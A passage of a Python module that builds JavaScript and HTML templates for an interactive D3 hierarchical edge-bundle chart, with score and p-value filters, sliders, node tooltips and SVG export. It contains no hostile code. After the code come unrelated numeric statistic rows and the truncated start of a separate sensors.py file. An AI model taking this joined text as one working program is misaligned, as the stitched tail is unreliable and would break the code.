var form_score = document.getElementById("scoreSelect")
var form_val_score;
for(var i=0; i<form_score.length; i++){
if(form_score[i].checked){
form_val_score = form_score[i].id;
}
}
if (form_val_score == "PosScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_p_score, currValues.max_p_score, 'score_pos');
var linkLine = updateBundle(FlareData);
} else if (form_val_score == "NegScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
//Filter with the new score threshold
var FlareData = filterData(currValues.min_n_score, currValues.max_n_score, 'score_neg');
var linkLine = updateBundle(FlareData);
} else if (form_val_score == "AbsScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_abs_score, currValues.max_abs_score, 'score_abs');
var linkLine = updateBundle(FlareData);
}
} else {
if ("$pmFlag" == "true") {
if (form_val == "pvalueRadio") {
d3.select('#scoreSelect').style("display", 'none');
//Filter out all links prior to updating with the pvalue threshold
var FlareData = filterData(Number(d3.min(pvalues))/10, Number(d3.min(pvalues))/10, 'pvalue');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_pvalue, currValues.max_pvalue, 'pvalue');
var linkLine = updateBundle(FlareData);
}
} else {
d3.select('#scoreSelect').style("display", 'block');
}
}
var tension = currValues.tension;
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
function changeScore() {
var form = document.getElementById("scoreSelect")
var form_val;
for(var i=0; i<form.length; i++) {
if(form[i].checked){
form_val = form[i].id;
}
}
if (form_val == "PosScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(p_scores))*10, Number(d3.max(p_scores))*10, 'score_pos');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_p_score, currValues.max_p_score, 'score_pos');
var linkLine = updateBundle(FlareData);
} else if (form_val == "NegScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.min(n_scores))*10, Number(d3.min(n_scores))*10, 'score_neg');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_n_score, currValues.max_n_score, 'score_neg');
var linkLine = updateBundle(FlareData);
} else if (form_val == "AbsScoreRadio") {
//Filter out all links prior to updating with the score threshold
var FlareData = filterData(Number(d3.max(abs_scores))*10, Number(d3.max(abs_scores))*10, 'score_abs');
var linkLine = updateBundle(FlareData);
var FlareData = filterData(currValues.min_abs_score, currValues.max_abs_score, 'score_abs');
var linkLine = updateBundle(FlareData);
}
var tension = currValues.tension;
var line = linkLine.line;
var link = linkLine.link;
line.curve(d3.curveBundle.beta(tension));
link.attr("d", d => line(d.source.path(d.target)));
}
if ("$pmFlag" == "true") {
var filterDim = d3.select("#filterType");
filterDim.on("change", changeFilter);
}
var selectDim = d3.select("#scoreSelect");
selectDim.on("change", changeScore);
function updateBundle(data) {
pvalues = []
p_scores = []
n_scores = []
abs_scores = []
var line = d3.radialLine()
.curve(d3.curveBundle.beta(0.85))
.radius(function(d) { return d.y; })
.angle(function(d) { return d.x / 180 * Math.PI; });
var root = d3.hierarchy(packageHierarchy(data), (d) => d.children);
cluster(root)
var nodes = root.descendants();
node = node.data(nodes.filter(function(n) { return !n.children; }));
node.exit().remove();
function getFont() {
var fontBase = 1000;
var fontSize = $fontSize;
var ratio = fontSize / fontBase;
var width = canvas.clientWidth;
var size = width * ratio;
return (size|0) + 'px';
}
function getArcRadiusOffset() {
var arcBase = 1157;
var arcRatio = $arcRadiusOffset / arcBase;
var arcWidth = canvas.clientWidth;
var arcRadOffset = arcWidth * arcRatio;
return (arcRadOffset|0);
}
//Test to see if there are multiple blocks in the data. If none then set addArcs to false
var blocks = []
nodes.forEach(function(n) { if (n.data.Block !== undefined) { blocks.push(n.data.Block) }});
if ("$addArcs" == "true") {
var addArcs = true;
if (blocks.length == 0) {
addArcs = false;
}
} else {
var addArcs = false;
}
if (addArcs == true) {
var groupDict = {}
var adjArcRadiusOffset = getArcRadiusOffset();
var arcTextPositionOffset = 0.75 * adjArcRadiusOffset;
var arcRadius = innerRadius + adjArcRadiusOffset;
var arcGap = adjArcRadiusOffset + 5;
nodes.forEach(function(n) {
if (n.data.Block !== undefined) {
if (groupDict[n.data.Block] === undefined) {
groupDict[n.data.Block] = []
groupDict[n.data.Block].push(n)
} else {
groupDict[n.data.Block].push(n)
}
}
})
var groups = []
for (var [key, value] of Object.entries(groupDict)) {
groups.push(value[0])
}
edgeBundle.selectAll("g.group").remove();
var groupData = edgeBundle.selectAll("g.group")
.data(groups)
.enter().append("group")
.attr("class", "group");
var groupArc = d3.arc()
.innerRadius(innerRadius)
.outerRadius(arcRadius)
.startAngle(function(d) { return (findStartAngle(d.__data__.parent.children)-$extendArcAngle) * Math.PI / 180;})
.endAngle(function(d) { return (findEndAngle(d.__data__.parent.children)+$extendArcAngle) * Math.PI / 180});
edgeBundle.selectAll("g.arc").remove();
edgeBundle.selectAll("g.arc")
.data(groupData._groups[0])
.enter()
.append("svg:path")
.attr("d", groupArc)
.attr("class", "groupArc")
.attr("fill", function(d) { return d.__data__.data.block_color; })
.style("fill-opacity", 1.0)
.attr("id", function(d,i) { return "arc_"+i; });
edgeBundle.selectAll(".arcText").remove();
edgeBundle.selectAll(".arcText")
.data(groupData._groups[0])
.enter()
.append("text")
.attr("class", "arcText")
.attr("x", 5) //Move text from the start angle of the arc
.attr("dy", arcTextPositionOffset) //Move the text down
.append("textPath")
.attr("xlink:href",function(d,i){return "#arc_"+i;})
.style("font-size", getFont())
.text(function(d){return d.__data__.data.Block;});
} else {
var arcGap = 5;
}
if ("$mouseOver" == "true") {
var newNode = node.enter().append("text")
.attr("class", "node")
.attr("dy", ".31em")
.attr("transform", function(d) { return "rotate(" + (d.x - 90) + ")translate(" + (d.y + arcGap) + ",0)" + (d.x < 180 ? "" : "rotate(180)"); })
.style("text-anchor", function(d) { return d.x < 180 ? "start" : "end"; })
.text(function(d) { return d.data.Label; })
.style("font-size", getFont())
.style("fill", function(d) { return d.data.node_color; })
.on("mouseover", mouseovered_node)
.on("mouseout", mouseouted);
} else {
var newNode = node.enter().append("text")
.attr("class", "node")
.attr("dy", ".31em")
.attr("transform", function(d) { return "rotate(" + (d.x - 90) + ")translate(" + (d.y + arcGap) + ",0)" + (d.x < 180 ? "" : "rotate(180)"); })
.style("text-anchor", function(d) { return d.x < 180 ? "start" : "end"; })
.text(function(d) { return d.data.Label; })
.style("font-size", getFont())
.style("fill", function(d) { return d.data.node_color; })
.on("click", mouseovered_node)
.on("dblclick", mouseouted);
}
node = node.merge(newNode);
var links = packageImports(root.descendants());
if ("$pmFlag" == "true") {
links = links.map(d=> ({ ...d
, link_color: d.source.data.imports[d.target.data.id]["link_color"]
, link_score: d.source.data.imports[d.target.data.id]["link_score"]
, link_pvalue : d.source.data.imports[d.target.data.id]["link_pvalue"]}));
links.forEach(function(d) { abs_scores.push(Math.abs(d.link_score))
, pvalues.push(d.link_pvalue);
if (d.link_score >= 0) {
p_scores.push(d.link_score);
} else {
n_scores.push(d.link_score);
}
});
} else {
links = links.map(d=> ({ ...d
, link_color: d.source.data.imports[d.target.data.id]["link_color"]
, link_score: d.source.data.imports[d.target.data.id]["link_score"]}));
links.forEach(function(d) { abs_scores.push(Math.abs(d.link_score));
if (d.link_score >= 0) {
p_scores.push(d.link_score);
} else {
n_scores.push(d.link_score);
}
});
}
link = link.data(links);
link.exit().remove();
var newLink = link.enter().append("path")
.attr("class", "link")
.attr('d', d => line(d.source.path(d.target)))
.style("stroke", function(d) { return d.link_color; })
.on("mouseover", mouseovered_link)
.on("mouseout", mouseouted);
link = link.merge(newLink);
var linkLine = {"line": line, "link": link}
function findStartAngle(children) {
var min = children[0].x;
children.forEach(function(d) {
if (d.x < min) {
min = d.x;
}
});
return min;
}
function findEndAngle(children) {
var max = children[0].x;
children.forEach(function(d) {
if (d.x > max) {
max = d.x;
}
});
return max;
}
function mouseovered_node(d) {
peak_data = $node_data.data
if (Number.isNaN(Number(d.data[peak_data[0]]))) {
var init_value = d.data[peak_data[0]]
} else if (typeof Number(d.data[peak_data[0]]) == 'number') {
var init_value = Number(d.data[peak_data[0]]).toExponential();
}
html_line = "\\""+ peak_data[0] + "\\",\\"" + init_value + "\\"";
peak_data.forEach(function(p) {
if (p !== peak_data[0]) {
if (Number.isNaN(Number(d.data[p]))) {
var data_value = d.data[p];
} else if (typeof Number(d.data[p]) == 'number') {
var data_value = Number(d.data[p]).toExponential();
}
html_line = html_line + "\\n\\"" + p + "\\",\\"" + data_value + "\\"";
}
});
displayNodeData(html_line)
node
.each(function(n) { n.target = n.source = false; });
link
.classed("link--target", function(l) { if (l.target === d) return l.source.source = true; })
.classed("link--source", function(l) { if (l.source === d) return l.target.target = true; })
.filter(function(l) { return l.target === d || l.source === d; })
.each(function() { this.parentNode.appendChild(this); });
node
.classed("node--both", function(n) { return n.source && n.target; })
.classed("node--target", function(n) { return n.target; })
.classed("node--source", function(n) { return n.source; });
link.style('opacity', o => (o.source === d || o.target === d ? 1 : $linkFadeOpacity));
}
function mouseovered_link(d) {
node
.each(function(n) { n.target = true; n.source = true; });
link
.classed("link--source", function(l) { if (l.source.data.id === d.source.data.id) return l.target.target = true; });
node
.classed("node--target", function(n) { if (n.data.id == d.target.data.id) return n.target; })
.classed("node--source", function(n) { if (n.data.id == d.source.data.id) return n.source; });
link.style('opacity', o => (o.source === d.source || o.target === d.source ? 1 : $linkFadeOpacity))
var source = d.source.data.Label;
var target = d.target.data.Label;
html_line = "\\"Source\\",\\""+ source + "\\"\\n\\"Target\\",\\"" + target + "\\"\\n\\"Pvalue\\"," + d.link_pvalue.toPrecision(3) + "\\n\\"Score\\"," + d.link_score.toPrecision(3)
displayNodeData(html_line)
}
function mouseouted(d) {
d3.select('#nodedataPanel').selectAll("*").remove();
link
.classed("link--target", false)
.classed("link--source", false);
node
.classed("node--both", false)
.classed("node--target", false)
.classed("node--source", false);
link.style('opacity', 1);
node.style('opacity', 1);
}
function packageHierarchy(classes) {
var map = {};
function find(id, data) {
var node = map[id], i;
if (!node) {
node = map[id] = data || {id: id, children: []};
if (id.length) {
node.parent = find(id.substring(0, i = id.lastIndexOf("#")));
node.parent.children.push(node);
node.key = id.substring(i + 1);
}
}
return node;
}
classes.forEach(function(d) {
find(d.id, d);
});
return map[""];
}
function packageImports(nodes) {
var map = {}, imports = [];
nodes.forEach(function(d) {
map[d.data.id] = d;
});
nodes.forEach(function(d) {
if (d.data.imports) Object.keys(d.data.imports).forEach(function(i) {
imports.push({source: map[d.data.id], target: map[i]});
});
});
return imports;
}
return linkLine;
}
function filterData(minThreshold, maxThreshold, filtType) {
const data = flareData.map(a => ({...a}));
var FlareData = []
//Remove nodes from imports with weight below threshold
for (var i = 0; i < data.length; i++) {
var flare = data[i];
var links = flare.imports;
var newLinks = {}
for (const [key, value] of Object.entries(links)) {
var link_score = value["link_score"];
var link_color = value["link_color"];
if ("$pmFlag" == "true") {
var link_pvalue = value["link_pvalue"];
}
if (filtType == 'score_abs') {
if ((Math.abs(link_score) >= minThreshold) && (Math.abs(link_score) <= maxThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else if (filtType == 'score_neg') {
if ((link_score <= maxThreshold) && (link_score >= minThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else if (filtType == 'score_pos') {
if ((link_score >= minThreshold) && (link_score <= maxThreshold)) {
if ("$pmFlag" == "true") {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
} else {
newLinks[key] = {"link_score": link_score
, "link_color": link_color};
}
}
} else {
if ("$pmFlag" == "true") {
if (filtType == 'pvalue') {
if ((link_pvalue >= minThreshold) && (link_pvalue <= maxThreshold)) {
newLinks[key] = {"link_score": link_score
, "link_pvalue": link_pvalue
, "link_color": link_color};
}
}
}
}
}
flare.imports = newLinks;
FlareData.push(flare)
}
return FlareData;
}
function displayNodeData(datasetText) {
d3.select('#nodedataPanel').selectAll("*").remove();
var rows = d3.csvParseRows(datasetText),
table = d3.select('#nodedataPanel').append('table')
.style("border-collapse", "collapse")
.style("border", "2px black solid");
var tablebody = table.append("tbody");
rows = tablebody
.selectAll("tr")
.data(rows)
.enter()
.append("tr");
cells = rows.selectAll("td")
.data(function(d) { return d; })
.enter()
.append("td")
.text(function(d) { return d; })
.style("border", "1px black solid")
.style("font-size", "15px");
};
}
redraw();
// Redraw based on the new size whenever the browser window is resized.
window.addEventListener("resize", redraw);
'''
return js_text
def __getHTML(self):
html_text = '''
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="https://rawgit.com/rzajac/angularjs-slider/master/dist/rzslider.css">
</head>
<style> $css_text </style>
<body ng-app="rzSliderDemo">
<div class="row" ng-controller="MainCtrl">
<div class="col-4">
<div class="row col-2-auto">
<form id="filterType">
<input type='radio' id="scoreRadio" value="Score" name="mode" ng-click="score_toggle()" checked/> Score
<input type='radio' id="pvalueRadio" value="Pvalue" name="mode" ng-click="pvalue_toggle()"/> Pvalue
</form>
</div>
<div class="row col-3-auto">
<form id="scoreSelect">
<input type="radio" id="PosScoreRadio" name="mode" value="Positve" ng-click="pos_toggle()"/> Positive
<input type="radio" id="NegScoreRadio" name="mode" value="Negative" ng-click="neg_toggle()"/> Negative
<input type="radio" id="AbsScoreRadio" name="mode" value="Absolute" ng-click="abs_toggle()" checked/> Absolute
</form>
</div>
<div ng-show="abs_visible" class="row">
<rzslider id="abs_slider" class="abs_slider" rz-slider-model="abs_slider.minValue" rz-slider-high="abs_slider.maxValue" rz-slider-options="abs_slider.options"></rzslider>
</div>
<div ng-show="pos_visible" class="row">
<rzslider id="pos_slider" class="pos_slider" rz-slider-model="pos_slider.minValue" rz-slider-high="pos_slider.maxValue" rz-slider-options="pos_slider.options"></rzslider>
</div>
<div ng-show="neg_visible" class="row">
<rzslider id="neg_slider" class="neg_slider" rz-slider-model="neg_slider.minValue" rz-slider-high="neg_slider.maxValue" rz-slider-options="neg_slider.options"></rzslider>
</div>
<div ng-show="pvalue_visible" class="row">
<rzslider id="pvalue_slider" class="pvalue_slider" rz-slider-model="pvalue_slider.minValue" rz-slider-high="pvalue_slider.maxValue" rz-slider-options="pvalue_slider.options"></rzslider>
</div>
<div class="row">
<rzslider id="tension_slider" class="tension_slider" rz-slider-model="tension_slider.value" rz-slider-options="tension_slider.options"></rzslider>
</div>
<div id="save" class="row">
<button data-ng-click="savebutton()">Save</button>
</div>
</div>
</div>
<div id="edgeBundlePanel"></div>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-animate.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-aria.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angular_material/1.0.0/angular-material.min.js"></script>
<script src="https://rawgit.com/rzajac/angularjs-slider/master/dist/rzslider.js"></script>
<script src="https://d3js.org/d3.v5.min.js"></script>
<script>
(function(){var g=typeof exports!="undefined"&&exports||this;var b='<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">';function e(h){return h&&h.lastIndexOf("http",0)==0&&h.lastIndexOf(window.location.host)==-1}function a(k,m){var h=k.querySelectorAll("image");var l=h.length;if(l==0){m()}for(var j=0;j<h.length;j++){(function(q){var o=q.getAttributeNS("http://www.w3.org/1999/xlink","href");if(o){if(e(o.value)){console.warn("Cannot render embedded images linking to external hosts: "+o.value);return}}var p=document.createElement("canvas");var i=p.getContext("2d");var n=new Image();o=o||q.getAttribute("href");n.src=o;n.onload=function(){p.width=n.width;p.height=n.height;i.drawImage(n,0,0);q.setAttributeNS("http://www.w3.org/1999/xlink","href",p.toDataURL("image/png"));l--;if(l==0){m()}};n.onerror=function(){console.log("Could not load "+o);l--;if(l==0){m()}}})(h[j])}}function f(h,k){var r="";var q=document.styleSheets;for(var o=0;o<q.length;o++){try{var u=q[o].cssRules}catch(s){console.warn("Stylesheet could not be loaded: "+q[o].href);continue}if(u!=null){for(var n=0;n<u.length;n++){var t=u[n];if(typeof(t.style)!="undefined"){var p=null;try{p=h.querySelector(t.selectorText)}catch(m){console.warn('Invalid CSS selector "'+t.selectorText+'"',m)}if(p){var l=k?k(t.selectorText):t.selectorText;r+=l+" { "+t.style.cssText+" }\\n"}else{if(t.cssText.match(/^@font-face/)){r+=t.cssText+"\\n"}}}}}}return r}function d(i,k,j){var h=(i.viewBox.baseVal&&i.viewBox.baseVal[j])||(k.getAttribute(j)!==null&&!k.getAttribute(j).match(/%$$/)&&parseInt(k.getAttribute(j)))||i.getBoundingClientRect()[j]||parseInt(k.style[j])||parseInt(window.getComputedStyle(i).getPropertyValue(j));return(typeof h==="undefined"||h===null||isNaN(parseFloat(h)))?0:h}function c(h){h=encodeURIComponent(h);h=h.replace(/%([0-9A-F]{2})/g,function(i,j){var k=String.fromCharCode("0x"+j);return k==="%"?"%25":k});return decodeURIComponent(h)}g.svgAsDataUri=function(j,i,h){i=i||{};i.scale=i.scale||1;var k="http://www.w3.org/2000/xmlns/";a(j,function(){var u=document.createElement("div");var r=j.cloneNode(true);var l,t;if(j.tagName=="svg"){l=i.width||d(j,r,"width");t=i.height||d(j,r,"height")}else{if(j.getBBox){var o=j.getBBox();l=o.x+o.width;t=o.y+o.height;r.setAttribute("transform",r.getAttribute("transform").replace(/translate\(.*?\)/,""));var p=document.createElementNS("http://www.w3.org/2000/svg","svg");p.appendChild(r);r=p}else{console.error("Attempted to render non-SVG element",j);return}}r.setAttribute("version","1.1");r.setAttributeNS(k,"xmlns","http://www.w3.org/2000/svg");r.setAttributeNS(k,"xmlns:xlink","http://www.w3.org/1999/xlink");r.setAttribute("width",l*i.scale);r.setAttribute("height",t*i.scale);r.setAttribute("viewBox",[i.left||0,i.top||0,l,t].join(" "));u.appendChild(r);var q=f(j,i.selectorRemap);var v=document.createElement("style");v.setAttribute("type","text/css");v.innerHTML="<![CDATA[\\n"+q+"\\n]]>";var n=document.createElement("defs");n.appendChild(v);r.insertBefore(n,r.firstChild);var p=b+u.innerHTML;var m="data:image/svg+xml;base64,"+window.btoa(c(p));if(h){h(m)}})};g.svgAsPngUri=function(j,i,h){g.svgAsDataUri(j,i,function(k){var l=new Image();l.onload=function(){var n=document.createElement("canvas");n.width=l.width;n.height=l.height;var o=n.getContext("2d");if(i&&i.backgroundColor){o.fillStyle=i.backgroundColor;o.fillRect(0,0,n.width,n.height)}o.drawImage(l,0,0);var m=document.createElement("a");h(n.toDataURL("image/png"))};l.src=k})};g.saveSvgAsPng=function(j,i,h){h=h||{};g.svgAsPngUri(j,h,function(l){var k=document.createElement("a");k.download=i;k.href=l;document.body.appendChild(k);k.addEventListener("click",function(m){k.parentNode.removeChild(k)});k.click()})}})();
</script>
<script> $js_text </script>
'''
return html_text
def __getHTMLdashboard(self):
html_text = '''
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style> $css_text </style>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.2.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" type="text/css" href="https://rawgit.com/rzajac/angularjs-slider/master/dist/rzslider.css">
</head>
<body ng-app="rzSliderDemo">
<div class="container-fluid py-5">
<div class="row" ng-controller="MainCtrl">
<div class="col-lg-9 col-12">
<div class="row">
<div class="col-md-12 mb-3">
<div class="card summary">
<div class="card-header">
<h4>Hierarchical Edge Bundle</h4>
</div>
<div class="card-body">
<div id="edgeBundlePanel"></div>
</div>
</div>
</div>
</div>
</div>
<div class="col-lg-3 col-12">
<div class="card mb-3">
<div class="card-body">
<div class="input-group mb-3">
<div class="card-body">
<div class="row col-2-auto">
<form id="filterType">
<input type='radio' id="scoreRadio" value="Score" name="mode" ng-click="score_toggle()" checked/> Score
<input type='radio' id="pvalueRadio" value="Pvalue" name="mode" ng-click="pvalue_toggle()"/> Pvalue
</form>
</div>
<div class="row col-3-auto">
<form id="scoreSelect">
<input type="radio" id="PosScoreRadio" name="mode" value="Positve" ng-click="pos_toggle()"/> Positive
<input type="radio" id="NegScoreRadio" name="mode" value="Negative" ng-click="neg_toggle()"/> Negative
<input type="radio" id="AbsScoreRadio" name="mode" value="Absolute" ng-click="abs_toggle()" checked/> Absolute
</form>
</div>
<div ng-show="abs_visible" class="row">
<rzslider id="abs_slider" class="abs_slider" rz-slider-model="abs_slider.minValue" rz-slider-high="abs_slider.maxValue" rz-slider-options="abs_slider.options"></rzslider>
</div>
<div ng-show="pos_visible" class="row">
<rzslider id="pos_slider" class="pos_slider" rz-slider-model="pos_slider.minValue" rz-slider-high="pos_slider.maxValue" rz-slider-options="pos_slider.options"></rzslider>
</div>
<div ng-show="neg_visible" class="row">
<rzslider id="neg_slider" class="neg_slider" rz-slider-model="neg_slider.minValue" rz-slider-high="neg_slider.maxValue" rz-slider-options="neg_slider.options"></rzslider>
</div>
<div ng-show="pvalue_visible" class="row">
<rzslider id="pvalue_slider" class="pvalue_slider" rz-slider-model="pvalue_slider.minValue" rz-slider-high="pvalue_slider.maxValue" rz-slider-options="pvalue_slider.options"></rzslider>
</div>
<div class="row">
<rzslider id="tension_slider" class="tension_slider" rz-slider-model="tension_slider.value" rz-slider-options="tension_slider.options"></rzslider>
</div>
<div id="save" class="row">
<button data-ng-click="savebutton()">Save</button>
</div>
</div>
</div>
</div>
</div>
<div class="card">
<div class="card-header">
<h4>Node Data</h4>
</div>
<div class="card-body">
<div id="nodedataPanel"></div>
</div>
</div>
</div>
</div>
</div>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-animate.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.8/angular-aria.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angular_material/1.0.0/angular-material.min.js"></script>
<script src="https://rawgit.com/rzajac/angularjs-slider/master/dist/rzslider.js"></script>
<script src="https://d3js.org/d3.v5.min.js"></script>
<script>
(function(){var g=typeof exports!="undefined"&&exports||this;var b='<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">';function e(h){return h&&h.lastIndexOf("http",0)==0&&h.lastIndexOf(window.location.host)==-1}function a(k,m){var h=k.querySelectorAll("image");var l=h.length;if(l==0){m()}for(var j=0;j<h.length;j++){(function(q){var o=q.getAttributeNS("http://www.w3.org/1999/xlink","href");if(o){if(e(o.value)){console.warn("Cannot render embedded images linking to external hosts: "+o.value);return}}var p=document.createElement("canvas");var i=p.getContext("2d");var n=new Image();o=o||q.getAttribute("href");n.src=o;n.onload=function(){p.width=n.width;p.height=n.height;i.drawImage(n,0,0);q.setAttributeNS("http://www.w3.org/1999/xlink","href",p.toDataURL("image/png"));l--;if(l==0){m()}};n.onerror=function(){console.log("Could not load "+o);l--;if(l==0){m()}}})(h[j])}}function f(h,k){var r="";var q=document.styleSheets;for(var o=0;o<q.length;o++){try{var u=q[o].cssRules}catch(s){console.warn("Stylesheet could not be loaded: "+q[o].href);continue}if(u!=null){for(var n=0;n<u.length;n++){var t=u[n];if(typeof(t.style)!="undefined"){var p=null;try{p=h.querySelector(t.selectorText)}catch(m){console.warn('Invalid CSS selector "'+t.selectorText+'"',m)}if(p){var l=k?k(t.selectorText):t.selectorText;r+=l+" { "+t.style.cssText+" }\\n"}else{if(t.cssText.match(/^@font-face/)){r+=t.cssText+"\\n"}}}}}}return r}function d(i,k,j){var h=(i.viewBox.baseVal&&i.viewBox.baseVal[j])||(k.getAttribute(j)!==null&&!k.getAttribute(j).match(/%$$/)&&parseInt(k.getAttribute(j)))||i.getBoundingClientRect()[j]||parseInt(k.style[j])||parseInt(window.getComputedStyle(i).getPropertyValue(j));return(typeof h==="undefined"||h===null||isNaN(parseFloat(h)))?0:h}function c(h){h=encodeURIComponent(h);h=h.replace(/%([0-9A-F]{2})/g,function(i,j){var k=String.fromCharCode("0x"+j);return k==="%"?"%25":k});return decodeURIComponent(h)}g.svgAsDataUri=function(j,i,h){i=i||{};i.scale=i.scale||1;var k="http://www.w3.org/2000/xmlns/";a(j,function(){var u=document.createElement("div");var r=j.cloneNode(true);var l,t;if(j.tagName=="svg"){l=i.width||d(j,r,"width");t=i.height||d(j,r,"height")}else{if(j.getBBox){var o=j.getBBox();l=o.x+o.width;t=o.y+o.height;r.setAttribute("transform",r.getAttribute("transform").replace(/translate\(.*?\)/,""));var p=document.createElementNS("http://www.w3.org/2000/svg","svg");p.appendChild(r);r=p}else{console.error("Attempted to render non-SVG element",j);return}}r.setAttribute("version","1.1");r.setAttributeNS(k,"xmlns","http://www.w3.org/2000/svg");r.setAttributeNS(k,"xmlns:xlink","http://www.w3.org/1999/xlink");r.setAttribute("width",l*i.scale);r.setAttribute("height",t*i.scale);r.setAttribute("viewBox",[i.left||0,i.top||0,l,t].join(" "));u.appendChild(r);var q=f(j,i.selectorRemap);var v=document.createElement("style");v.setAttribute("type","text/css");v.innerHTML="<![CDATA[\\n"+q+"\\n]]>";var n=document.createElement("defs");n.appendChild(v);r.insertBefore(n,r.firstChild);var p=b+u.innerHTML;var m="data:image/svg+xml;base64,"+window.btoa(c(p));if(h){h(m)}})};g.svgAsPngUri=function(j,i,h){g.svgAsDataUri(j,i,function(k){var l=new Image();l.onload=function(){var n=document.createElement("canvas");n.width=l.width;n.height=l.height;var o=n.getContext("2d");if(i&&i.backgroundColor){o.fillStyle=i.backgroundColor;o.fillRect(0,0,n.width,n.height)}o.drawImage(l,0,0);var m=document.createElement("a");h(n.toDataURL("image/png"))};l.src=k})};g.saveSvgAsPng=function(j,i,h){h=h||{};g.svgAsPngUri(j,h,function(l){var k=document.createElement("a");k.download=i;k.href=l;document.body.appendChild(k);k.addEventListener("click",function(m){k.parentNode.removeChild(k)});k.click()})}})();
</script>
<script> $js_text </script>
'''
return html_text
| 51.600928
| 3,807
| 0.414782
| 14,391
| 177,920
| 4.999305
| 0.056633
| 0.011342
| 0.0103
| 0.02135
| 0.871096
| 0.857919
| 0.84559
| 0.837918
| 0.829147
| 0.822767
| 0
| 0.011895
| 0.480722
| 177,920
| 3,448
| 3,808
| 51.600928
| 0.766815
| 0.001518
| 0
| 0.74925
| 0
| 0.053223
| 0.838827
| 0.155876
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007871
| false
| 0
| 0.017241
| 0
| 0.040105
| 0.014243
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
c4d847b499d717984dc63570952952722a9614ff
| 7,260
|
py
|
Python
|
visualization/sensors.py
|
h-mayorquin/time_series_basic
|
654fb67ef6258b3f200c15a2b8068ab9300401d7
|
[
"BSD-3-Clause"
] | null | null | null |
visualization/sensors.py
|
h-mayorquin/time_series_basic
|
654fb67ef6258b3f200c15a2b8068ab9300401d7
|
[
"BSD-3-Clause"
] | null | null | null |
visualization/sensors.py
|
h-mayorquin/time_series_basic
|
654fb67ef6258b3f200c15a2b8068ab9300401d7
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Visualize function realted to the sensors
"""
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import seaborn as sns
import numpy as np
import nexa.loading as load
sns.set(style='white')
def visualize_STDM(nexa_object, ax=None):
"""
Routine which plots using seaborn
"""
to_plot = nexa_object.STDM
if ax is None:
fig, ax = plt.subplots(figsize=(11, 9))
# Generate a custom diverging colormap
